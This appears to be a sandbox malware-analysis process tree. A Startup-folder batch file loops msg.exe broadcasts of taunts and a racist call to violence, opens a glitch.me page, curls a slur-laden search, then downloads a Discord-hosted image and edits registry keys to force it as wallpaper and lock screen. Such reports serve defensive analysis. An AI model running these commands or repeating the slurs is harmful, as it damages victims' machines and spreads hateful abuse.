  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:3692
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:3552
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:3720
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:4148
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:3940
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:3628
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:3708
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:540
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:2012
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:5772
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:5080
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:5988
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:5844
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:2376
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:4452
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:5240
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:3688
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:3756
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:3024
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:5084
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:4464
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:2368
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:3524
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:4472
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:5164
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:4380
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:2272
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:1020
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:1252
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:724
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:3356
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:4264
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:5404
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:5852
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:2012
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:5772
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:6032
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:3468
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:4928
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:1248
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:6100
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:2388
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:2996
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:1920
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:1224
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:1876
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:4380
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:5596
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:3668
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:1264
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:5704
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:2672
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:5780
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:5192
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:5708
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:4756
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:4764
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:2388
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:3076
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:2368
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:5524
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:5164
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:4504
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:2468
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:3876
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:2012
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:1768
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:644
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:4132
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:3620
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:3076
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:5012
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:5524
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:1088
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:3648
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:3660
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:5552
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:3408
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:3356
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:4960
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:2996
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:5848
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:4528
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:4764
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:4692
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:4132
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:568
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:3288
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:2404
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:4540
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:3152
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:3544
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:3748
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:1368
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:3468
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:1100
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:4540
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:6132
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:1088
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:2996
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:3860
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:6132
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:4540
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:3688
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:6484
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:6500
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:6516
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:6532
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:6548
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:6564
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:6644
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:7012
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:7028
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:7048
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:7072
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:7136
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:7160
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:6276
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:6364
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:6732
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:6752
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:6740
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:6764
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:6840
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:6828
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:6376
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:3688
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:6416
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:6756
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:1764
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:6528
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:6568
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:6696
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:2892
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:1752
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:6332
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:6760
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:6912
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:6928
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:6784
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:6512
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:6424
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:7140
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:3688
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:1136
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:6916
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:6640
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:6604
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:6500
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:3688
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:2904
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:6640
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:6796
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:6308
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:6392
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:5804
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:6800
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:6308
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:6392
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:2892
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:7276
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:7292
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:7328
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:7368
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:7404
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:7436
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:7448
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:7768
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:7784
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:7800
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:7828
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:7852
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:7884
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:7908
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:7200
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:2856
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:3904
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:6760
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:7284
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:7308
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:5916
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:6080
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:7908
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:7784
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:8120
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:7676
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:7796
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:7304
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:8352
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:8384
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:8420
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:8464
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:8484
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:8636
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:8644
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:8800
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:8832
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:8864
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:8896
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:8928
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:9000
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:9184
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:7332
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:8080
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:8316
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:8340
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:7304
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:8352
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:8540
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:8624
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:8796
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:8836
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:8868
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:8900
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:8928
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:8964
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:8316
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:8328
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:8372
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:8376
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:8416
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:8648
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:8832
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:8364
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hig.bat"
    3⤵
    - Drops file in Drivers directory
    - Drops file in System32 directory
    - Drops file in Program Files directory
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of WriteProcessMemory
    PID:5288
  - - C:\Windows\system32\openfiles.exe
      openfiles
      4⤵
      PID:4716
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "(new-object -com shell.application).minimizeall()"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      PID:4832
  - - C:\Windows\system32\curl.exe
      curl -O https://media.discordapp.net/attachments/1198940919777472532/1349364239487467550/IMG_3728.png
      4⤵
      PID:3008
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "Wallpaper" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\IMG_3728.png" /f
      4⤵
      Sets desktop wallpaper using registry
      PID:4076
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "WallpaperStyle" /t REG_SZ /d 10 /f
      4⤵
      PID:3864
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "TileWallpaper" /t REG_SZ /d 0 /f
      4⤵
      PID:1092
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Personalization" /v "LockScreenImage" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\IMG_3728.png" /f
      4⤵
      PID:3612
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background" /v "OEMBackground" /t REG_DWORD /d 1 /f
      4⤵
      PID:4368
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background" /v "BackgroundType" /t REG_DWORD /d 0 /f
      4⤵
      PID:4944
